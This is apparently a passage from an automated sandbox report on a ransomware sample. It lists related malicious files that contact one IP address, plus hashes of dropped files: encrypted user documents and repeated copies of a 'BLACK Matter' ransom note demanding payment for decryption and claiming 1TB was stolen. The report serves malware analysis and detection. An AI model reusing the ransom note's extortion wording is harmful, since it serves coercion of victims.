              biz-1524011879.xlsGet hashmaliciousBrowse
              • 103.224.212.222
              biz-1469942768.xlsGet hashmaliciousBrowse
              • 103.224.212.222
              payload_1.xlsGet hashmaliciousBrowse
              • 103.224.212.222
              dat4568309.xlsmGet hashmaliciousBrowse
              • 103.224.212.222
              YdJEOW8QLi.exeGet hashmaliciousBrowse
              • 103.224.212.222
              Y3XbNKupz7.exeGet hashmaliciousBrowse
              • 103.224.212.222
              3bM1b7GL87.exeGet hashmaliciousBrowse
              • 103.224.212.222
              PozfYoUNtW.exeGet hashmaliciousBrowse
              • 103.224.212.222
              Order confirmation+Invoice.pdf___.exeGet hashmaliciousBrowse
              • 103.224.212.222
              sgRkrN.dllGet hashmaliciousBrowse
              • 103.224.212.222
              mrcommunity.exeGet hashmaliciousBrowse
              • 103.224.212.222
              TKRH98rgNe.exeGet hashmaliciousBrowse
              • 103.224.212.222
              cL15K2OdrU.exeGet hashmaliciousBrowse
              • 103.224.212.222

              Dropped Files

              No context

              Created / dropped Files

              C:\ProgramData\kVuoJyeoW.bmp
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 16
              Category:dropped
              Size (bytes):2621494
              Entropy (8bit):0.33984115657693365
              Encrypted:false
              SSDEEP:12:GKmb9VZxphxz3db7t/7BNbXldTVtVFzV3Z1TtdL1RVP3N5VLL3JD5JXRZBZhRBHJ:2
              MD5:89541866099188CD5F570E1D9DD78672
              SHA1:6B6120962F6BDA368045EB881973C2332CA215C5
              SHA-256:3D04DFB85C79126DF85989C09CF53CDAA5709DC0B59A3F7CB559007A5934A8D0
              SHA-512:B696214C87A0DCB7BA1D15BB0A1DDF968B0C7940322CDEE30E36BB95014824D26C1C6E77BED1115FDEA0334352A9F3EA3ED43F905722CAD11D15A77EEB0B2741
              Malicious:true
              Reputation:low
              Preview: BM6.(.....6...(.....................(...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\3D Objects\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:false
              Reputation:low
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Contacts\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:true
              Reputation:low
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Desktop\BJZFPPWAPT\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:false
              Reputation:low
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Desktop\BNAGMGSPLO.jpg.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.808004741030638
              Encrypted:false
              SSDEEP:24:djir7AoeDENMu2W9t/QKlpszUaZymf+qsUJxqIMp5ShttiFKBr/pa:dj/oOENM4hvto+qBvcp5SNZk
              MD5:4AB99B1643259752B4934D11FA710A93
              SHA1:A05754054272F0C47EFF4242185FFBF2F9B47495
              SHA-256:B343816546539D4209E3B721D988C88367EBFAA6C9A19E57237BD9EA17706E01
              SHA-512:0241ABA9CBC2EC2666A4EFFA46961F0957470B4A1856D886A47E3F9AA7FBEB7F0E262FCC6BB92D032C0AB0DA0B02F712F9402AE8273AF64CEB595C3B0F8124F2
              Malicious:false
              Reputation:low
              Preview: 2{.&....f#,RX;;..I)_..0f3+.Bo......fj..{.e..x..9.B,4.\..X.1..z....1 TV..E.86.f.}..?..:6..x.O........T..#[......J:.....t.|.C....#..n-...a..0}ZNkh.R..-.6.-$..f.a-~.|...._;..R`}.............*...M..f.........m'.K.y.....x........d.h.V[....9.!.b..x.|8...T}...:.]#.[...n...v,s..../...s.E.{..gp}.4.2yt(J....e...P.X[.............7....w..z..S...}....U.....N./h......w~..9.v4U.B'....6.Sxw..Q...zv.@+....i....4A.....l(.@.X|..%..../....Y_VN.P....s!.8...2..$BU...:.'.@..+...L.U..p..!ZO..2/.l.^..#.n.AD..D......8.h.P[...=...d.j.}w.w.~S;.v..=8x{{...R..M..{..0{.BK...fN..W'p5*....5......7.bt..v.J..9.......15y.....G.".........J...&..$.v.@}.,.'r.v.t._}.....<..o6..k5:.4.$.WS[.\.*j.%...C..O.KQ.T...7..-XX..U....,..B...F......K....6.../...}E..........p.[......G h...f+)....O...T&...^:1..Y-.;S&....dRT2M.a....6...3.Vc"{.O....}..*,.r.e.?.R....+!..*...21,A.....u5....6....bg..\......0..r.y.~._. ....|...j......./.uW.U.+..1..W.rD*..l].A@......E.o.U..VgS...e.O..;.S..
              C:\Users\user\Desktop\BNAGMGSPLO.xlsx.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.839281513059947
              Encrypted:false
              SSDEEP:24:qhy23eLXD5m/R0QRbH6yYHK3iKxOvYUbFU7c42P:qhy2WXD5m/R0QmHsQvY7c4M
              MD5:13B282E65CD78EEEFE9350DDCC63085B
              SHA1:E3C11D3B6FC31183D227B15874998FE10F375AA4
              SHA-256:E36785C82D136D71F4C509B3594A796D7E7622B3645345E355149AAA85F7C24F
              SHA-512:5C78E134393BF466210A544E31553E819E5E8AF4EB9B52189103CA526DAB4D2F74C4C6A03D81F9A636549D747F7153D54E49AFDDB0BD7071106EA8C97BAF24CD
              Malicious:false
              Reputation:low
              Preview: ......Y..R..v#\IdF..EC.s.U.......{.q..s.Gh.T.p....e?-..8...R..|......F...|..e.w#0U(#.}.+7..0.`..d~DY)s......K.a?0Q}.~"...$......;.r..Z...?.........._{\.6..R.....U5oG..U............ E.3XhC.\...q..$.Z..mj.<.v...YI.......EP.<T..C.......|......b..y.?......!...%,/.%!.....B..".-fh.[.f....uQ.v..D....."..j.M[C.KL....Cs......TnQ<\.. ....m.T.B,.=t....[1.2...h._...+.U..>..4.4.C[.t.(.B..o..:s"......{........N3!D...T0..O...lT.F....k.u../.f,\{..`(.f.s-...|....A.~.w..W.T.W0k....<(7W&.C.9.....V..b=g......i`.....XB..B....Z....."..a..1.T..g.2.B.].sO. .Z_?."...WXp'%f..Q..f.....(......-(w.Z.m.#ekcs.a}t.\...U.$.9..,......z.v..x..*.&a.n..s..]'..R.....q.....r.RQ..g...bC..0.x.Vu.F....^'X...$..?..|.G..(....p...Vu..i.?6/GYr.e......y.X.=...#.>.{yy...2.O../J......6o<W.w..Cg.;p...:.....Qe......G....^......N.!d.yFo..P....K.|....|.rb.......'7.....-..v)u.W......7.T.....e.R....u.__..bB.4..i...d.r.._..,......EH).:.......N.a).b..`........E...l~.......(.$Tc...:.0..>n.d.")
              C:\Users\user\Desktop\BNAGMGSPLO\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:true
              Reputation:low
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Desktop\DUUDTUBZFW.jpg.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.83354346245067
              Encrypted:false
              SSDEEP:24:4VAGxwkKTLP3vlRzwjxrbm0oRvwxiYn29r8nxEsUayXMNVd1FnuU+KOBK:mG9X/zMxryDwx6ashXod1I6OBK
              MD5:CBF8B91A18B96435936CF7A7F253A914
              SHA1:393BF40A0858970021590CF31A6638C3B39A974E
              SHA-256:8B8D431415513DC29BD072EF3940D790109EAB3B5C571030A69E87942FE0323E
              SHA-512:9E0A3B000AE899B2F88B46A09336251655787395AF77E7797E5C04B5809378539696A1271EBE4190B3EEFB94E08D1684226EDEF0EE5193FE7AD23479BF5FC2D7
              Malicious:false
              Reputation:low
              Preview: ..uS.t.T..z.....;'..r..e..1..vo....]......d.~..sC.q.GPh..fN.~..A.....V.a.\$..x..,...T.{j..:Z..0..>U...j}.......9.P....q..B...h....tn.s.6!....LHq.|.P...p.M.F3.......,...I..6&.....s.|ON;'v....S.....b.....V8.{.....nd99.0>.p..u.[..>>.b...:....e...hj...+..I6..P.#.Sp..9.^2s...q..C....!.Gh....p...Z..H9rI....6Dlh.Z.Fe=..H.*.:X.Xf.w.D6:N....].Sj...yz......;Kt....r~.&.+%.(.t....E+..1...[.S~...pYE.!.`.B.....$L?......U.aDa.U..f...-....HM.........=f|.E.b.a............6...9.Q.C..U?.Ze...L..Y.....^f...z.1M.>3....wr.:.{].YG....k...>. .9.G..j).U.p!.,pR.u..3...=}-...T...I...G.Z....?...b.2.V...9c3.Z...........(g.t.X.~.g...|L...D..?3T..`.._..T|.4I...d..w...fWT.s.=.zTP0.....?...].VSb&.(...}.?.g....my..i.;.C.R.F=..z...%>~#.......O..Tb..4^..DP.X9.fu.B.....[.!5w...).9_l/.}{}....p...\c.....z..w....14.{R..ne4qT...|.Up....3.*.-.i...A.._...==A..l....3Z......'.l....7.6...1.G.}.....4.........W...S7...Z...a....;...bx....m...3....._.D....o.=...4.{4.9.......
              C:\Users\user\Desktop\DUUDTUBZFW\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:false
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Desktop\EEGWXUHVUG.png.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.812172851252621
              Encrypted:false
              SSDEEP:24:61e1n9Fw144bmZrNoBM7lK6TxqoEdWRsmvRUiTvAbPV90EF2r:geLFhAANoBII62WRBpDYJ9ur
              MD5:90D7B2C23AD2856D54739E9F79030B58
              SHA1:66270C0542952EA0F3FAB0FF729661EDE32DF4DF
              SHA-256:B97ED22D92602A6D0BF06855FC57FFDF48862EB4079C093DDC181CBB58BC3BFC
              SHA-512:B62D067C34DEC1B697FE0A92A68267786854FCEDCDAC76C47D79B58EFD4F2F0CFCE6A23966007EFF2671CD85732E72CE52BBE640357A9827D456C0D3C4269E86
              Malicious:false
              Preview: .o.4f.......M....Jh.T.......S....<s....A....r..Tt.$.R[..[.....7?...E~C.<B.-.nZ.k..(.iy..lj.*.....N=..D..k..<.......n.sS2eN...?....6...#|.X.@-..1_.dw.?.#UN..g;.Q..#.d...8C.....9G.h..]8.@..b.7.....Ni..V.Qg|.)..k(.>J..zmy...!.....W.*..W#...=w.8.....<.\..[.......2..C...&...../f.0%@.b3..#...Z...*..Z%...o3.....i...|.].P.W.....2,%.......'T..v^.`..- ...e.....~6U..i.. ..V.\.V.........(......b.=~{cs.7N..5..5:...0.Z...".."..ot.M........L.).....{F#.....9.K...#.\.aJ .Cw._.=....O..I<D@.:.....8SW..E/J,.4.r..A....z.....4b..4..Ic....k....^^z..d..g.'.:.7..P/..oz.m........[Mj.w.....D.p=/..I#..W.W.....4...._%../B<....E7.....9.......n.. ..iS..}.'-...n......z.%.8.c..$..BP5.0u......U7..J.;j.1..D.\Mqvd....WS;....W.|.v...i.<.p....a..#...36.u...t_..'V....9.b...2.....t.k.5.IQ......r..Qj...r.]F..Uk=FJ.|J..C.....Bg.D.......T.u.._B.U..;1./.[... ...9V:f..b.%I./.q...k.3.!...../|/zHO....D8...CxN.wm..n...R.*6..<J.,.....J.*v...<4.g..ePJ`...Lmn...J/....cw..w..X.
              C:\Users\user\Desktop\EFOYFBOLXA.jpg.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.830118542114172
              Encrypted:false
              SSDEEP:24:cM7gkOhkwDoe+hzKrUbQufpJzgKuvpSjpOs3po282a:cM7gpoMr10gpOOApxI
              MD5:0B4C5C5D50034022E916F74DB27B23EE
              SHA1:7076BFD48315016540C9FB1507D6693AFCA8EC13
              SHA-256:5BB7964690DA50EF1DB456C47D4A4314E09585D0D166F6C1EDB7E2A8034B4111
              SHA-512:57ECA0B2A5C9FF09835C29D20F91C25061F193115E541369355D01DF225B1276DC12E92BFF51539FA2D72C03B3C7A5F07F10914D407520A7484C43EC6FA73AE6
              Malicious:false
              Preview: '.b.KdB.d...)......U..4..bV...|8......'.......@.,^.'..V..N...y..J..._EE.W.....l........^..1AvdQ.!v...<R.Ks.T..m.X/..fq.....=...HN..%..J...:r2.o...l.M..[..J.d.l6.Q..Vi.w...(.nf.<.B..9..H..v)..G.%....CnE..^.s.T..bd.....f...P.:.].Za,..p..._..$.JX...#..!..;X.......w.j..^...f{P.i~.W^!..w.g.....HX..........v..j.iI...\...F.).c:...;.#.^T.....ph.pw:.T(...!J.TT........j.....4.....;K...H._..~.t....O.E...e@@.00l..L..<......*i.+U0/..1...(./.p....fu'o-..U....U.?.'v..;.P.B..j......"a;.7 ........m...~...j.....\ ...$.S.j.1s.R..P`..W..*....i..:p..q.w2/!...j...Qd.y.{pf.x.;....$5.b..[.f.A,..C.&I.Q.U..21..,D..=_...1Z;...v.....q'.w..]6....bK..6.zX.n./...K...8IL..~..g........K...........(......./.R}..e_..yJ.Z./...>....g...I.e.{.3...i.F.B..*A}.-r.-.a..u.c....n..GA.........}0'.MTL$......9[Zb.]..................4.dW.....H...XY....i`$'.q.p...V.1#......x.{kd...}H...ZW:S;Yr%;..^D.........)x.x._..~........b..m>.0.(.?..G|..8..0k......(...E&"S...q.@.C..-..}.N.N..
              C:\Users\user\Desktop\EFOYFBOLXA.mp3.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.824679867229879
              Encrypted:false
              SSDEEP:24:+JXhSIDJRuSHQ+9UMjLyZsALWTAB8Zw7DLNpouTatsgbyWdjzCmE1d:+RhSIDJRm+P3yZrLkqIw7D4u+xPdfNE3
              MD5:4A025377B581F7258D1725D73CF772A4
              SHA1:9B32A17EE18DA5B5AC49AA961DF623706E54E27B
              SHA-256:C758D8E21E2F3B8C7B3E1D0CD4315578A85DE6E4BEEE7F72EAC25DB93F5C36B5
              SHA-512:2A06F58835E5E32412D4859F2B01BA4865D385B4DEFEA4D4128C9E694420F025303CA821C2C01CF142D7A0CA622E8EB829F9756A591D9391F4C71BAD2450C14A
              Malicious:false
              Preview: ....|..1...3....4..%.$l.....J......_....Sl..\...S...w...*dR.....;...&.N..E.0..)...+..R4.L.E:z..E.#..Uf(.C.6.n.#.7...J ]T.m?..~..A|.LSc.s.vr"..-9BW..Z..m9.X..>........-...D...f]l.5.[.....Q. :<..dY...N.#=..3....nK.9:[..y.t4....N......E.W.h.cyV.Tv[..e|....O.~s...,./K'=.$.....!UJ.T.nh.d..p.NK..D..X.@.^..9)..........f....1..j.Z...D6.P/.q+.8..H.]B.l.S..f....OSx......'..N...z>._..-....c.[g...C..k3..P....Xbe....8......n..[..Sa..?q..k[....B... U. ..........3i.<D.A.........h.g..u..G}.......u...e#/.5m=`]n.P.yy...m.I.......^..$...:A.a.EX+.6Y...$...+.c9.9M.....C.........l.....:t.s....Wi....E.%..(dH...e....m..!.W1l8m](.2....x.q..{...o....A.L....L..[C.|*.%..}U..n....A.T`hG...O.......G|<......m.Rk.g...q."h[~(H...dn"..b..t9...Fh...no}..y......\...n3.L.3Ks..E...3>.9.10....Yq.f.lO.).r...^.....=V.....5..=..`S.v.=..$C.9.;...,/b.h=..:#..*..?.c..lGa.. :i....2...\...v....7..c.A.~..b......v..]..).^..`....E.;..j..{..^...*D....g.m...B......".b...UZ.=...k..?.......R
              C:\Users\user\Desktop\EFOYFBOLXA.pdf.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.823233907684467
              Encrypted:false
              SSDEEP:24:qGLceUQ9230TRpdasjgHA/s5z6aRQ9Zejl0dWpgIHL+S7VcS33/:qGLPUjkTRp4syA05z6aRqWl6WpgCLd7n
              MD5:6526E5C1F46789DC382C5F8ED9CB4E35
              SHA1:E0A0C1228B1E01DB81FF0887E1D7471D5FDE2B75
              SHA-256:8C821EA694C09DEBB42B2F051E641FAC9181A94A7B21708C74E539B7D0BBF3BB
              SHA-512:7A9733700C7F24C5375F92AC23A81218F4E6D6FD78266DBB475630DBBEDFBC046D56156D6F51B29D3CCEF44295DCDCC8E08E3B003B4D03BE322F1880E657B20D
              Malicious:false
              Preview: .k:<....@,....H.SZ[.E......lJ.k&.l`/..p....(....C..Y5.?.#..ju."..>...H..vx.p.G.-.(..G......W.'.|.EEv...*....Y+...d1HD...gs[.f.kWHS.....c.B...s...C.5P.}..86,6..W..:`B.>..Z........3...s~...<l.\...c.S...O9....3.x.....x.]...a.7..T.rI.f..ei...G..-..J2..N...jK>.{.-=*.E...Dl...._+...H....D.1..n...Y...O......3.......IuC......d.s...H..?..,.e..#gdA....c|y....7..9]..@...=C.l.s.bb....w....;E..e.@.{Q_i.}...8`.8.....y....&....\>4.4..,Xn...9.w.0......:..i...mf.....?T5....X.....'.1.K..=&.t@F....B....(...1.9....d%P[.Y.N.B.-.`Iz.J.g%)$.BP.m......C.......@&&.ZDDI.j....e....O.{w... ....rF..w....G$.......?.wI[f?.....,..]'.K....+.*..|bX.(Y.}<%...m..F1..<......O.V.....j...hu.4Y.Y,1...^.R.!..U#4.q.K.m...X..3y..6-....Z_.ORlZ+C.a.v.g.....A].,.Q.IS.UN....c..7.A.z....L}..$s..NjF......o.=.l....-..6Uj...$.&.C.Rt..pe+.H.O/6.w..W.Qv..;..9.Y.D..*.v.....{.}.).ti.=.O.rr ...R@\.N5&.m.B.....R..9QU.E.w...I....z...:.......$.......u4...{...E.....6...z........~.F..Dr...;e..>
              C:\Users\user\Desktop\EWZCVGNOWT.png.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.844285022879791
              Encrypted:false
              SSDEEP:24:4r/0keNmtXQ+9V3O64yhlY8QAecUvMQjPzBXFYfEC1exLtP3b3TiqbNZ1:80kVXHVLRwc0jPzBXuMCMd3bTiqpZ1
              MD5:6A321CA102183EF1CA34EDF6C802DAB4
              SHA1:E76CD2BB0A5E3978E226C73A50179C0D43531A6C
              SHA-256:CF9F561F26DF815E5988ECE5E833E8FBC047A233135AA7FD3538918DABC45FA0
              SHA-512:7AE284D82795FE4BD559258266A5A5C03216F7A57377956621FB59016E3C25F301B38F667CAD680CD2699DCDC05FA6367D2CD1924F84433A1BF8393BBC1CD475
              Malicious:false
              Preview: *0..6....._.H..?.:..a(..m..;T.Y.....)....g,>p!..Cr.r.L..G.w..c.....F..J\....n...v.....mx.s..\.$O214o;..|R".7Q..p.G....%D..D..Q....9.[..i..lg[.9I[.6.~Fj.tA$..E.Q...F...i.r.".V*......}...c.....l..,.........y.v.P{.5p.. 8Nt4.}6z.T..b..H...CFr.<z.d..a..s.V....X5&N..K.s.9........`u....B.?.em.T........H....O.{O.A.<..c...Q.).n.G...L..*,.:..%0....f......L.D...eEl...P.i..6.3.....$..\.'...}...e.E...e....0....a."..../i......I.g.;...S..u.D?..l.!.j....4.v.1...f...dG..X..|M.Q.~.#9].m.LF........{6.|"H....Mj.^.m8...~.hn.~N_B.'....F@_.i.a...w.H..\..u"........z.oT2...F..p...D.6...1..sLk.t.|.N...ar..<..y..mh.....^ .*7..~.R`..D..N..!.......e..p.+...(.l..j)-........_u)eL5&...\A.c.4"..l.hU..(..&.vN..C..H....=..#!#4..-......r.....c..........2K..nP..V..!.......8.z@..V.....&.9=G.Z.oC*.D..._`.M.e.U...v...2.o(.....8C....{.l.9.,@....Vc.......y....(...U<.........%..@.F..>.*.:....iP.[lX.npB..u..JD.t.vd..c.8W.J.aO........]M.y:-..Eg`r...!.G.w.1.u.#40.}Z...1.F..U.{..?..
              C:\Users\user\Desktop\GAOBCVIQIJ.docx.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.828985779708512
              Encrypted:false
              SSDEEP:24:CcLYDJD1omN1JFwHlYDRfy4brVEDe9ao7y0+rGWQ:Bk1DfLmCVfNrVEDro7y0uG9
              MD5:06C3B8A20CF7629DE4AA174D224C77DD
              SHA1:D82E8EA2F17F8911EC83351325F058856A943811
              SHA-256:0C19CFA6E224A6503AEB60CB577A3ED7AA79A6AE02D1E91AAFF48B8F30B6ED0B
              SHA-512:DEE9A010C3BB09CA8C592676532C9F6E6C5E9508ABA2FC9089D0D4024F16C4BBE910C0988A859E67D04C279BD21DCA57CD8928E3B317741574783C9C3C5F3315
              Malicious:false
              Preview: .][j_._.~.*.b.6.....=.~...p...}W..<fQ.....#~..tq.....=..........M(.1..5x9......C..n.=........5*...=..m.'.6........y}R....-....N...C.<z...'&..}5.h....|....*.@.N..\.y>kg-.(...... .b..._{B.R...5...K.a....1..o..<.&D.H.i...........jV.....^.#.n.%...H.np........,..x........s.G.....).=.O.7..+.aM..?..t&....B...w..a.....JG........W....'"2......:Z...c..r....9..h2$...|...-.)..W....~Y.WD....VN..1....:3.5b..R....K..#...lH.r.......;,f.....K4.95...3.......w..~.A.o.....T..x..........(q...F...<...{K.(.aC=C...._y..h....+lh./..P..:......G_e.k.<...Ta &.z...#^.4. .6#b.....g.tS.."...(0-.h....|.../S...QA.....k.....T.@.R.}....O....J.J..|.S..l..t.M,....E.[.\\..F..'........X.....o^._.T........d..U..&4......@..:k.r~3.Rjx.K..<.....Iu.!.T...X....v..g.xe.P..t.OkP....9..nH.fTb. ...*"\.k)P..TgH.6-~X......X...Li....A........7....hU..hp....'.8_.tKM.....(..4....q.-.&..1...{!s.......N...De..bX.7V{.M............9._4.../.*R....Xv.%#.......lk%..$...p..zV.dJT.@[..t1..
              C:\Users\user\Desktop\GAOBCVIQIJ.pdf.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.834751008311722
              Encrypted:false
              SSDEEP:24:dMY5KH3EuzQGumnAvUm0Oni+9MyzpvfidfTsb:ddm0uzQ5mnAchui+9MSvmfgb
              MD5:A49B525CF7CAE45AFE9E009A0C8894A2
              SHA1:5842C70F01AB43369CD00FCC811485876A741D0D
              SHA-256:FDD109C6A7733C7E1B9B44776B9887FF7F41E7D934A238F3D03DDEE5465E9463
              SHA-512:32E34384C474D8270AA9D8AA5184652613F0298E75F49B4A51BDFD8F3E69CFC9EDAE93CEB7EAA0252F18A32EF625DA7F4509E437017D31C21AA4D32CACA1129D
              Malicious:false
